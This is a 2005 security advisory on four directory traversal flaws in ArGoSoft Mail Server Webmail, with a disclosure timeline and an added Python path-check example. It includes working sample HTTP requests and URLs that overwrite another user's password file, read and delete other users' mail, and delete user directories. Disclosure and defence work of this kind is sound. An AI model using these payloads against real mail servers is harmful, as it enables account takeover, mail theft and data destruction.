SIG^2 Vulnerability Research Advisory

ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities

by Tan Chew Keong
Release Date: 09 Feb 2005

Summary

ArGoSoft Mail Server is a fully functional SMTP/POP3/Finger server (the Pro version also has an IMAP module) for Windows 95/98/NT/2000, which lets you turn your computer into an email system. It is very compact, takes about 1-5 MB of disk space (depending on the version), has no specific memory requirements and, most importantly, is very easy to use.

Multiple directory traversal vulnerabilities were found in ArGoSoft Mail Server's Webmail that may be exploited by a logged-on mail user to upload files to arbitrary directories on the server, retrieve arbitrary files from the server, access other users' emails, and create/delete arbitrary directories on the server.

 
Tested System

ArGoSoft Mail Server Version 1.8.7.3 on English WinXP SP2, Win2K SP4.

 
Details

This advisory documents 4 directory traversal vulnerabilities in ArGoSoft Mail Server's Webmail. Exploitation of these vulnerabilities requires a valid logon account on the Webmail. Please note that although the examples use the forward-slash sequence (../) for directory traversal, in several cases the back-slash sequence (..\) also works.

a. Directory traversal in email attachment filename allows file upload to arbitrary directories

ArGoSoft Mail Server's Webmail allows a logged-on mail user to upload file attachments when composing an email. Lack of input sanitization of the supplied filename allows the user to upload files to arbitrary locations on the server. This may be exploited by a malicious mail user to replace another user's password file (userdata.rec) with a copy that has a known password, thus allowing him/her to log on as that user.

A sample malicious file upload HTTP request is shown below.

POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile"; filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2

test2
0
1
0

-----------------------------24242261923581--

 
b. Directory traversal in _msgatt.rec allows arbitrary files on the server to be sent as attachments

When the Webmail user is composing an email, all attachments uploaded for that email will be saved in the following temporary directory.

C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\username\_tempatt\

A sample listing of this directory is shown below.

 Directory of C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\test\_tempatt

02/09/2005  08:18p      <DIR>          .
02/09/2005  08:18p      <DIR>          ..
02/09/2005  08:17p                  90 inbox.msl
02/09/2005  08:18p                 167 TESTFILE.txt // file attachment uploaded by user
02/09/2005  08:18p                  13 _msgatt.rec
02/09/2005  08:18p                   0 _msgbody.rec
02/09/2005  08:18p                 136 _msgdata.rec
               5 File(s)            406 bytes

The server creates the file _msgatt.rec in this temporary directory. It lists the filenames of all attachments that the user has uploaded while composing the current email. The user can control the contents of this file by uploading an attachment with the same filename as this server-generated file; the uploaded copy replaces the one generated by the server.

By uploading a specially crafted _msgatt.rec containing directory traversal characters, it is possible to cause the server to send any file on the server as an attachment to the user. A malicious user may exploit this vulnerability to email another user's password file (userdata.rec) to himself.

A sample malicious _msgatt.rec file is shown below.

../../test2/userdata.rec

This malicious file, when uploaded as an attachment and saved to the temporary directory, will contain two additional server-generated lines, as shown below.

../../test2/userdata.rec
-
_msgatt.rec

To ensure that the email can be sent correctly, the malicious user must "detach" the last two entries (i.e. "-" and "_msgatt.rec"). This can be trivially done via the web interface as shown below. Subsequently, when the user retrieves his email via IMAP, he will receive test2's userdata.rec file as an attachment.

 
c. Directory traversal in /msg and /delete "Folder" parameter allows reading/deleting of other users' emails

The /msg link allows the Webmail user to view his/her emails. The full URL is

http://[hostname]/msg?MsgNo=0&Folder=inbox&UIDL=sjo2z7plfizwvu3x

It is possible to view other users' emails by using directory traversal characters in the Folder parameter and specifying a correct UIDL. The UIDL uniquely identifies the email, and guessing the UIDL of another user's email is impractical. However, it is possible to obtain a list of the UIDLs of another user's emails by browsing to the following link while logged on. Note that inbox.msl only exists if the other user is currently logged on, i.e. the server creates inbox.msl in each user's temporary directory (see vulnerability b. above) only after he/she has logged on.

http://[hostname]/_users/_nodomain/other_username/_tempatt/inbox.msl

Sample contents are shown below.
j18mspvyiitdzxdw
zrr77aepklpadkv5
nuczv11pjysmrceu
10zptzip5g8ejlwx
ymufn1briuvp2ocu

It is then possible to retrieve the other user's emails using the following link.

http://[hostname]/msg?MsgNo=0&Folder=../other_username/inbox&UIDL=j18mspvyiitdzxdw

The /delete link, which allows the user to delete his/her own emails, is similarly vulnerable.

A sample malicious POST request to /delete is shown below. This will delete mails belonging to user test2.

POST /delete HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: Close

x=36&y=11&sel=0&act=1&folderselect=&j18mspvyiitdzxdw=on&Folder=../test2/inbox

 
d. Directory traversal in /folderadd and /folderdelete "Folder" parameter allows creating/deleting arbitrary directories on the server

The /folderadd and /folderdelete links allow the Webmail user to create/delete mail folders. It is possible to use directory traversal characters in the Folder parameter to create/delete directories in arbitrary locations on the server. A malicious user may exploit this vulnerability to delete other users' entire mail directories, which is effectively the same as removing those users from the system.

The following will totally remove user test2 from the system.

http://[hostname]/folderdelete?Folder=../test2
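All four issues (a to d) share one root cause: a user-supplied attachment filename or Folder value is joined onto a per-user directory without checking that the result stays inside it. The following Python is an added example, not code from this advisory or from ArGoSoft; it models the per-user layout shown in the listing above with ntpath (so the Windows path logic runs anywhere), treats both separators alike as the advisory notes, and also refuses uploads named after the server-generated files from that listing (the collision behind issue b). How the real server maps its handlers to base directories is an assumption here.

```python
import ntpath
from typing import Optional

# Base directory from the listing in the advisory; how the real server maps
# its handlers to base directories is an assumption of this example.
USERS_ROOT = r"C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain"
# Files the server itself writes into _tempatt (same listing); an upload
# with one of these names would overwrite server-generated state (issue b).
RESERVED_NAMES = {"inbox.msl", "_msgatt.rec", "_msgbody.rec", "_msgdata.rec"}


def user_dir(username: str) -> str:
    """Mail directory of one account; 'Folder' values must stay inside it."""
    return ntpath.join(USERS_ROOT, username)


def tempatt_dir(username: str) -> str:
    """Temporary attachment directory used while composing a message."""
    return ntpath.join(user_dir(username), "_tempatt")


def resolve_within(base_dir: str, value: str) -> Optional[str]:
    """Join value onto base_dir; return the result only if it stays strictly
    inside base_dir, else None. Forward slashes are folded to backslashes
    first because '..\\' traverses on Windows as well as '../'."""
    if not value or "\x00" in value:
        return None
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, value.replace("/", "\\")))
    try:  # ValueError: different drive, or absolute mixed with relative
        common = ntpath.commonpath([base, candidate])
    except ValueError:
        return None
    # normcase makes the comparison case-insensitive, like the Windows FS;
    # a candidate equal to base ('.' or 'inbox\..') is also rejected.
    if ntpath.normcase(common) != ntpath.normcase(base):
        return None
    if ntpath.normcase(candidate) == ntpath.normcase(base):
        return None
    return candidate


def is_safe_attachment_name(name: str) -> bool:
    """Stricter rule for upload names: a single component, not reserved."""
    flat = name.replace("/", "\\")
    if not flat or flat in (".", "..") or ntpath.basename(flat) != flat:
        return False
    return flat.lower() not in RESERVED_NAMES
```

Run against the advisory's own values, every traversal string (../../test2/userdata.rec, ../other_username/inbox, ../test2) resolves outside the caller's directory and is refused, while plain names such as inbox or TESTFILE.txt pass.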

 
Patch

  1. Upgrade to version 1.8.7.4.

 
Disclosure Timeline

06 Feb 05 - Vulnerability Discovered.
08 Feb 05 - Initial Vendor Notification.
08 Feb 05 - Received Notification from Vendor that Fixed Version was Released.
09 Feb 05 - Public Release.

 
Contacts

For further questions and enquiries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 09/02/2005
webmaster@security.org.sg